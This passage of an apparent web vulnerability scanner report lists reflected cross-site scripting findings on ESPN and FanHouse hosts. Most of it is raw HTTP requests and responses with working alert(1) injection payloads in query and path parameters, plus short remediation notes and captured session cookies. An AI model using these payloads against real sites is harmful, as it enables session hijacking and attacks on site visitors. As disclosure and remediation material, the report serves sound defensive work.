GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame09&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickema6c58"%3balert(1)//be026dd05fd HTTP/1.1
Host: espn.go.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 14:21:08 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 14:21:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN22
Cache-Expires: Sat, 06 Nov 2010 14:29:28 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 2910
The value of the player request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e261'%3balert(1)//073d4ffc633 was submitted in the player parameter. This input was echoed as 6e261';alert(1)//073d4ffc633 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame096e261'%3balert(1)//073d4ffc633&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1
Host: espn.go.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 14:18:34 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 14:18:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN02
Cache-Expires: Sat, 06 Nov 2010 14:26:54 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 3022
The value of the player request parameter is copied into a JavaScript rest-of-line comment. The payload 79c55</script><script>alert(1)</script>f04c1eba61f was submitted in the player parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame0979c55</script><script>alert(1)</script>f04c1eba61f&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1
Host: espn.go.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 14:18:42 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 14:18:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN32
Cache-Expires: Sat, 06 Nov 2010 14:27:02 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 3132
The value of the width request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c16e'%3balert(1)//7133253776d was submitted in the width parameter. This input was echoed as 4c16e';alert(1)//7133253776d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame09&height=2431a1a5'%3balert(1)//f13274ea7b9&width=4324c16e'%3balert(1)//7133253776d&omniPageName=fantasy:poker:pokerpickem HTTP/1.1
Host: espn.go.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 14:19:56 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 14:19:56 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN04
Cache-Expires: Sat, 06 Nov 2010 14:28:16 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 3106
2.17. http://fantasyfootball.fanhouse.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://fantasyfootball.fanhouse.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5646c"-alert(1)-"bc0ed5df7f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?5646c"-alert(1)-"bc0ed5df7f8=1 HTTP/1.1
Host: fantasyfootball.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b83e1<script>alert(1)</script>d5ce256c82c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mpcommons/staticb83e1<script>alert(1)</script>d5ce256c82c/css/main HTTP/1.1
Host: g.espncdn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
X-Cnection: Close
Content-Length: 147
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Date: Sat, 06 Nov 2010 16:11:27 GMT
Connection: close
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/mpcommons/staticb83e1<script>alert(1)</script>d5ce256c82c/css/main</BODY></HTML>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c9679<script>alert(1)</script>3c99b6ca0a5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mpcommons/static/cssc9679<script>alert(1)</script>3c99b6ca0a5/main HTTP/1.1
Host: g.espncdn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
X-Cnection: Close
Content-Length: 147
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Date: Sat, 06 Nov 2010 16:11:32 GMT
Connection: close
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/mpcommons/static/cssc9679<script>alert(1)</script>3c99b6ca0a5/main</BODY></HTML>
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 91bdc<script>alert(1)</script>182530dbb64 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mpcommons/static/css/main91bdc<script>alert(1)</script>182530dbb64 HTTP/1.1
Host: g.espncdn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
X-Cnection: Close
Content-Length: 147
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Date: Sat, 06 Nov 2010 16:11:35 GMT
Connection: close
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/mpcommons/static/css/main91bdc<script>alert(1)</script>182530dbb64</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a89ef<script>alert(1)</script>59ae141c417 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mpcommons/statica89ef<script>alert(1)</script>59ae141c417/js/main HTTP/1.1
Host: g.espncdn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
X-Cnection: Close
Content-Length: 146
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Date: Sat, 06 Nov 2010 16:11:34 GMT
Connection: close
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/mpcommons/statica89ef<script>alert(1)</script>59ae141c417/js/main</BODY></HTML>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5d1cb<script>alert(1)</script>4c687beadc5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mpcommons/static/js5d1cb<script>alert(1)</script>4c687beadc5/main HTTP/1.1
Host: g.espncdn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
X-Cnection: Close
Content-Length: 146
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Date: Sat, 06 Nov 2010 16:11:37 GMT
Connection: close
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/mpcommons/static/js5d1cb<script>alert(1)</script>4c687beadc5/main</BODY></HTML>
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cd44f<script>alert(1)</script>1c2bc0e9cef was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mpcommons/static/js/maincd44f<script>alert(1)</script>1c2bc0e9cef HTTP/1.1
Host: g.espncdn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
X-Cnection: Close
Content-Length: 146
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Date: Sat, 06 Nov 2010 16:11:41 GMT
Connection: close
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/mpcommons/static/js/maincd44f<script>alert(1)</script>1c2bc0e9cef</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7b155<script>alert(1)</script>4134dc3e7cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /frontpage7b155<script>alert(1)</script>4134dc3e7cb HTTP/1.1
Host: games.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Connection: close
Content-Length: 131
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/frontpage7b155<script>alert(1)</script>4134dc3e7cb</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9f36c<script>alert(1)</script>45bed4dd97c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /frontpage9f36c<script>alert(1)</script>45bed4dd97c/basketball HTTP/1.1
Host: games.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found
Connection: close
Content-Length: 142
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/frontpage9f36c<script>alert(1)</script>45bed4dd97c/basketball</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b7707<script>alert(1)</script>fed908440a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /frontpage/basketballb7707<script>alert(1)</script>fed908440a5 HTTP/1.1
Host: games.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found
Connection: close
Content-Length: 142
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/frontpage/basketballb7707<script>alert(1)</script>fed908440a5</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dd1f8<script>alert(1)</script>3870a2a6f26 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /pokerpickem/endd1f8<script>alert(1)</script>3870a2a6f26/frontpage HTTP/1.1
Host: games.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; 